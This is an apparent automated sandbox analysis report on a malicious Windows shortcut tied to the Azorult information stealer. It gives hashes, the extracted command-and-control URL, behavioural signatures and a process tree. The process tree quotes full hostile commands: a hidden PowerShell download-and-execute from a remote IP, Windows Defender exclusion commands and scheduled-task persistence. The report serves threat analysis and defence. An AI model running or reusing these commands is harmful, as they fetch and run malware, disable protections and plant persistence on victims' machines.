Analysis
-
max time kernel
141s -
max time network
103s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2024 05:15
Static task
static1
Behavioral task
behavioral1
Sample
9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414.lnk
Resource
win10v2004-20241007-en
General
-
Target
9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414.lnk
-
Size
1KB
-
MD5
24b35581ca3b4d40271e57c85e296acb
-
SHA1
06772cefa2064960b2db126373dc65cb39aca466
-
SHA256
9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414
-
SHA512
4d828fe1d9bed99f9616f84cce7893ea69923f07dd75a3da8e1e5b2bb840ddaa642aa8187721d0a198c1700413df4c79387419c7376a8d704e7bfb644d18c1da
Malware Config
Extracted
azorult
http://h8m5b.shop/ML341/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 1216 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2084 powershell.exe 2228 powershell.exe 1216 powershell.exe 1216 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation setup_x86.exe -
Executes dropped EXE 1 IoCs
pid Process 2112 setup_x86.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2112 set thread context of 2320 2112 setup_x86.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_x86.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1592 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 1216 powershell.exe 1216 powershell.exe 2112 setup_x86.exe 2112 setup_x86.exe 2112 setup_x86.exe 2112 setup_x86.exe 2112 setup_x86.exe 2112 setup_x86.exe 2084 powershell.exe 2228 powershell.exe 2112 setup_x86.exe 2084 powershell.exe 2228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 2112 setup_x86.exe Token: SeDebugPrivilege 2084 powershell.exe Token: SeDebugPrivilege 2228 powershell.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2884 wrote to memory of 1216 2884 cmd.exe 85 PID 2884 wrote to memory of 1216 2884 cmd.exe 85 PID 1216 wrote to memory of 2112 1216 powershell.exe 91 PID 1216 wrote to memory of 2112 1216 powershell.exe 91 PID 1216 wrote to memory of 2112 1216 powershell.exe 91 PID 2112 wrote to memory of 2084 2112 setup_x86.exe 100 PID 2112 wrote to memory of 2084 2112 setup_x86.exe 100 PID 2112 wrote to memory of 2084 2112 setup_x86.exe 100 PID 2112 wrote to memory of 2228 2112 setup_x86.exe 102 PID 2112 wrote to memory of 2228 2112 setup_x86.exe 102 PID 2112 wrote to memory of 2228 2112 setup_x86.exe 102 PID 2112 wrote to memory of 1592 2112 setup_x86.exe 104 PID 2112 wrote to memory of 1592 2112 setup_x86.exe 104 PID 2112 wrote to memory of 1592 2112 setup_x86.exe 104 PID 2112 wrote to memory of 2320 2112 setup_x86.exe 106 PID 2112 wrote to memory of 2320 2112 setup_x86.exe 106 PID 2112 wrote to memory of 2320 2112 setup_x86.exe 106 PID 2112 wrote to memory of 2320 2112 setup_x86.exe 106 PID 2112 wrote to memory of 2320 2112 setup_x86.exe 106 PID 2112 wrote to memory of 2320 2112 setup_x86.exe 106 PID 2112 wrote to memory of 2320 2112 setup_x86.exe 106 PID 2112 wrote to memory of 2320 2112 setup_x86.exe 106 PID 2112 wrote to memory of 2320 2112 setup_x86.exe 106
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://217.160.121.141:8030/5643254657/Crypted.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Users\Admin\Downloads\setup_x86.exe"C:\Users\Admin\Downloads\setup_x86.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\setup_x86.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\sXACnJccZk.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sXACnJccZk" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB75.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1592
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2320
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
18KB
MD50ba0aa4abc0f3d890395147ec917a04b
SHA13c5647b805e926cf32cca164b79ee04fe6467361
SHA25680013f211bec4fbbe63a36545a43dd47f50b770c900c00ca2e3aa2b2493f2444
SHA5124c3334259abd0ae62c76a3eb14b50b1094b0bc733a2fccd24c7a6af0bdde0f0c4a920260a8ceebebe1960a0572db92739e68e92e124dc7e97f64d9f62b78f665
-
Filesize
1KB
MD5eb4d127b8a6f84a1cee423c5e3e3a51d
SHA1c55263a8ff097067f2393ce2120801a445fd1949
SHA256d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514
SHA51245a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5565843cb643c4cc166714dea3e0bf12d
SHA1d7cb3c34ffa3e5f36c01abf1a1342a804656cc45
SHA2564c99787d828e7e6d47ffdfc98c451651803a7c23d9bfa69068bcef614948933b
SHA512b4bff460893d90040a0a3f702cfdb8d1b223c12aeafa1da716edd8dc1be72d2424ebcbf618e4ae897c39b271951df926eac8ea648e1b1962323e5eda5cd212de
-
Filesize
584KB
MD57c79a1035c5735d3d0b304564a33ba1a
SHA1ecf62b17647c2db020119168e0eb12aa16984bc8
SHA256c9f9cac249b944a81dcaf942997c774b267cd4b27d64318dd5d91583274098f1
SHA512c86a3f3d311f1f512f4dda2dc768a85bbe5fd5473a62a0b9a1232490c656588e333a8906be2d2971fd39a6e389a211c886857a443b31a0a951b47c2f0b75229b